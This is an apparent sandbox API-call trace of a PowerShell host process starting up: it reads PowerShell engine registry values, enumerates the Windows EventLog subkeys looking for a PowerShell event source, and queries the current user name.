	[0533.635] RegQueryInfoKeyW (in: hKey=0x320, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xeceac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xecea8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xeceac*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xecea8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0533.635] CoTaskMemFree (pv=0x0) 
	[0533.635] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0533.635] RegEnumValueW (in: hKey=0x320, dwIndex=0x0, lpValueName=0x2c9220, lpcchValueName=0xecf58, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xecf58, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0533.635] CoTaskMemFree (pv=0x2c9220) 
	[0533.635] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0533.636] RegEnumValueW (in: hKey=0x320, dwIndex=0x1, lpValueName=0x2c9220, lpcchValueName=0xecf58, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xecf58, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0533.636] CoTaskMemFree (pv=0x2c9220) 
	[0533.636] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0533.636] RegEnumValueW (in: hKey=0x320, dwIndex=0x2, lpValueName=0x2c9220, lpcchValueName=0xecf58, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xecf58, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0533.636] CoTaskMemFree (pv=0x2c9220) 
	[0533.636] RegQueryValueExW (in: hKey=0x320, lpValueName="StackVersion", lpReserved=0x0, lpType=0xecf3c, lpData=0x0, lpcbData=0xecf38*=0x0 | out: lpType=0xecf3c*=0x1, lpData=0x0, lpcbData=0xecf38*=0x8) returned 0x0
	[0533.636] CoTaskMemAlloc (cb=0xc) returned 0x1b838710
	[0533.636] RegQueryValueExW (in: hKey=0x320, lpValueName="StackVersion", lpReserved=0x0, lpType=0xecf0c, lpData=0x1b838710, lpcbData=0xecf08*=0x8 | out: lpType=0xecf0c*=0x1, lpData="2.0", lpcbData=0xecf08*=0x8) returned 0x0
	[0533.636] CoTaskMemFree (pv=0x1b838710) 
	[0533.637] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0533.637] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0533.638] CoTaskMemFree (pv=0x30ac60) 
	[0533.642] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0533.642] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0533.642] CoTaskMemFree (pv=0x30ac60) 
	[0534.442] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfd8 | out: phkResult=0xecfd8*=0x2f4) returned 0x0
	[0534.445] RegQueryInfoKeyW (in: hKey=0x2f4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xecf4c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xecf48, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xecf4c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xecf48*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0534.446] CoTaskMemFree (pv=0x0) 
	[0534.446] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0534.446] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x0, lpName=0x2c9220, lpcchName=0xecfd8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xecfd8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0534.447] CoTaskMemFree (pv=0x2c9220) 
	[0534.447] CoTaskMemFree (pv=0x0) 
	[0534.447] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0534.447] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x1, lpName=0x2c9220, lpcchName=0xecfd8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xecfd8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0534.447] CoTaskMemFree (pv=0x2c9220) 
	[0534.447] CoTaskMemFree (pv=0x0) 
	[0534.447] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0534.447] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x2, lpName=0x2c9220, lpcchName=0xecfd8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xecfd8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0534.447] CoTaskMemFree (pv=0x2c9220) 
	[0534.447] CoTaskMemFree (pv=0x0) 
	[0534.447] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0534.447] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x3, lpName=0x2c9220, lpcchName=0xecfd8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xecfd8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0534.447] CoTaskMemFree (pv=0x2c9220) 
	[0534.447] CoTaskMemFree (pv=0x0) 
	[0534.447] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0534.447] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x4, lpName=0x2c9220, lpcchName=0xecfd8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xecfd8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0534.447] CoTaskMemFree (pv=0x2c9220) 
	[0534.447] CoTaskMemFree (pv=0x0) 
	[0534.447] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0534.447] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x5, lpName=0x2c9220, lpcchName=0xecfd8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xecfd8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0534.447] CoTaskMemFree (pv=0x2c9220) 
	[0534.447] CoTaskMemFree (pv=0x0) 
	[0534.447] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0534.448] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x6, lpName=0x2c9220, lpcchName=0xecfd8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xecfd8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0534.448] CoTaskMemFree (pv=0x2c9220) 
	[0534.448] CoTaskMemFree (pv=0x0) 
	[0534.448] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0534.448] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x7, lpName=0x2c9220, lpcchName=0xecfd8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xecfd8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0534.448] CoTaskMemFree (pv=0x2c9220) 
	[0534.448] CoTaskMemFree (pv=0x0) 
	[0534.448] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0534.448] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x8, lpName=0x2c9220, lpcchName=0xecfd8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xecfd8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0534.448] CoTaskMemFree (pv=0x2c9220) 
	[0534.448] CoTaskMemFree (pv=0x0) 
	[0534.448] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xed038 | out: phkResult=0xed038*=0x2f8) returned 0x0
	[0534.448] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed038 | out: phkResult=0xed038*=0x0) returned 0x2
	[0534.448] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xed038 | out: phkResult=0xed038*=0x2fc) returned 0x0
	[0534.448] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed038 | out: phkResult=0xed038*=0x0) returned 0x2
	[0534.448] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xed038 | out: phkResult=0xed038*=0x30c) returned 0x0
	[0534.449] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed038 | out: phkResult=0xed038*=0x0) returned 0x2
	[0534.449] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xed038 | out: phkResult=0xed038*=0x324) returned 0x0
	[0534.449] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed038 | out: phkResult=0xed038*=0x0) returned 0x2
	[0534.449] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xed038 | out: phkResult=0xed038*=0x328) returned 0x0
	[0534.449] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed038 | out: phkResult=0xed038*=0x0) returned 0x2
	[0534.449] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xed038 | out: phkResult=0xed038*=0x32c) returned 0x0
	[0534.449] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed038 | out: phkResult=0xed038*=0x0) returned 0x2
	[0534.449] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xed038 | out: phkResult=0xed038*=0x330) returned 0x0
	[0534.449] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed038 | out: phkResult=0xed038*=0x0) returned 0x2
	[0534.449] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xed038 | out: phkResult=0xed038*=0x334) returned 0x0
	[0534.449] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed038 | out: phkResult=0xed038*=0x0) returned 0x2
	[0534.450] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed038 | out: phkResult=0xed038*=0x338) returned 0x0
	[0534.450] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed038 | out: phkResult=0xed038*=0x33c) returned 0x0
	[0534.450] RegCloseKey (hKey=0x33c) returned 0x0
	[0534.450] RegCloseKey (hKey=0x2f4) returned 0x0
	[0534.451] RegCloseKey (hKey=0x338) returned 0x0
	[0534.467] CoTaskMemAlloc (cb=0x804) returned 0x1b85e960
	[0534.467] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b85e960, nSize=0xed248 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed248) returned 0x1
	[0534.469] CoTaskMemFree (pv=0x1b85e960) 
	[0534.470] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0534.470] GetUserNameW (in: lpBuffer=0x2c9220, pcbBuffer=0xed288 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed288) returned 1
	[0534.470] CoTaskMemFree (pv=0x2c9220) 
	[0536.332] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xecf88 | out: phkResult=0xecf88*=0x340) returned 0x0
	[0536.332] RegQueryInfoKeyW (in: hKey=0x340, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xecefc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xecef8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xecefc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xecef8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.332] CoTaskMemFree (pv=0x0) 
	[0536.332] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0536.332] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x0, lpName=0x2c9220, lpcchName=0xecf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xecf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.332] CoTaskMemFree (pv=0x2c9220) 
	[0536.332] CoTaskMemFree (pv=0x0) 
	[0536.332] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0536.332] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x1, lpName=0x2c9220, lpcchName=0xecf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xecf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.332] CoTaskMemFree (pv=0x2c9220) 
	[0536.332] CoTaskMemFree (pv=0x0) 
	[0536.332] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0536.332] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x2, lpName=0x2c9220, lpcchName=0xecf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xecf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.332] CoTaskMemFree (pv=0x2c9220) 
	[0536.332] CoTaskMemFree (pv=0x0) 
	[0536.332] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0536.332] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x3, lpName=0x2c9220, lpcchName=0xecf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xecf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.332] CoTaskMemFree (pv=0x2c9220) 
	[0536.332] CoTaskMemFree (pv=0x0) 
	[0536.332] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0536.332] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x4, lpName=0x2c9220, lpcchName=0xecf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xecf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.332] CoTaskMemFree (pv=0x2c9220) 
	[0536.332] CoTaskMemFree (pv=0x0) 
	[0536.332] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0536.332] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x5, lpName=0x2c9220, lpcchName=0xecf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xecf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.333] CoTaskMemFree (pv=0x2c9220) 
	[0536.333] CoTaskMemFree (pv=0x0) 
	[0536.333] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0536.333] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x6, lpName=0x2c9220, lpcchName=0xecf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xecf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.333] CoTaskMemFree (pv=0x2c9220) 
	[0536.333] CoTaskMemFree (pv=0x0) 
	[0536.333] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0536.333] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x7, lpName=0x2c9220, lpcchName=0xecf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xecf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.333] CoTaskMemFree (pv=0x2c9220) 
	[0536.333] CoTaskMemFree (pv=0x0) 
	[0536.333] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0536.333] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x8, lpName=0x2c9220, lpcchName=0xecf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xecf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.333] CoTaskMemFree (pv=0x2c9220) 
	[0536.333] CoTaskMemFree (pv=0x0) 
	[0536.333] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x344) returned 0x0
	[0536.333] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x0) returned 0x2
	[0536.333] RegOpenKeyExW (in: hKey=0x340, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x348) returned 0x0
	[0536.333] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x0) returned 0x2
	[0536.333] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x34c) returned 0x0
	[0536.333] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x0) returned 0x2
	[0536.334] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x350) returned 0x0
	[0536.334] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x0) returned 0x2
	[0536.334] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x354) returned 0x0
	[0536.334] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x0) returned 0x2
	[0536.334] RegOpenKeyExW (in: hKey=0x340, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x358) returned 0x0
	[0536.334] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x0) returned 0x2
	[0536.334] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x35c) returned 0x0
	[0536.334] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x0) returned 0x2
	[0536.334] RegOpenKeyExW (in: hKey=0x340, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x360) returned 0x0
	[0536.334] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x0) returned 0x2
	[0536.334] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x364) returned 0x0
	[0536.335] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x368) returned 0x0
	[0536.335] RegCloseKey (hKey=0x368) returned 0x0
	[0536.335] RegCloseKey (hKey=0x340) returned 0x0
	[0536.335] RegCloseKey (hKey=0x364) returned 0x0
	[0536.336] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xecf88 | out: phkResult=0xecf88*=0x364) returned 0x0
	[0536.336] RegQueryInfoKeyW (in: hKey=0x364, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xecefc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xecef8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xecefc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xecef8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.336] CoTaskMemFree (pv=0x0) 
	[0536.336] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0536.336] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x0, lpName=0x2c9220, lpcchName=0xecf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xecf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.336] CoTaskMemFree (pv=0x2c9220) 
	[0536.336] CoTaskMemFree (pv=0x0) 
	[0536.336] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0536.336] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x1, lpName=0x2c9220, lpcchName=0xecf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xecf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.336] CoTaskMemFree (pv=0x2c9220) 
	[0536.336] CoTaskMemFree (pv=0x0) 
	[0536.336] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0536.336] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x2, lpName=0x2c9220, lpcchName=0xecf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xecf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.336] CoTaskMemFree (pv=0x2c9220) 
	[0536.336] CoTaskMemFree (pv=0x0) 
	[0536.336] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0536.336] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x3, lpName=0x2c9220, lpcchName=0xecf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xecf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.337] CoTaskMemFree (pv=0x2c9220) 
	[0536.337] CoTaskMemFree (pv=0x0) 
	[0536.337] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0536.337] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x4, lpName=0x2c9220, lpcchName=0xecf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xecf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.337] CoTaskMemFree (pv=0x2c9220) 
	[0536.337] CoTaskMemFree (pv=0x0) 
	[0536.337] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0536.337] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x5, lpName=0x2c9220, lpcchName=0xecf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xecf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.337] CoTaskMemFree (pv=0x2c9220) 
	[0536.337] CoTaskMemFree (pv=0x0) 
	[0536.337] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0536.337] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x6, lpName=0x2c9220, lpcchName=0xecf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xecf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.337] CoTaskMemFree (pv=0x2c9220) 
	[0536.337] CoTaskMemFree (pv=0x0) 
	[0536.337] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0536.337] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x7, lpName=0x2c9220, lpcchName=0xecf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xecf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.337] CoTaskMemFree (pv=0x2c9220) 
	[0536.337] CoTaskMemFree (pv=0x0) 
	[0536.337] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0536.337] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x8, lpName=0x2c9220, lpcchName=0xecf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xecf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0536.337] CoTaskMemFree (pv=0x2c9220) 
	[0536.337] CoTaskMemFree (pv=0x0) 
	[0536.337] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x340) returned 0x0
	[0536.337] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x0) returned 0x2
	[0536.337] RegOpenKeyExW (in: hKey=0x364, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x368) returned 0x0
	[0536.338] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x0) returned 0x2
	[0536.338] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfe8 | out: phkResult=0xecfe8*=0x36c) returned 0x0
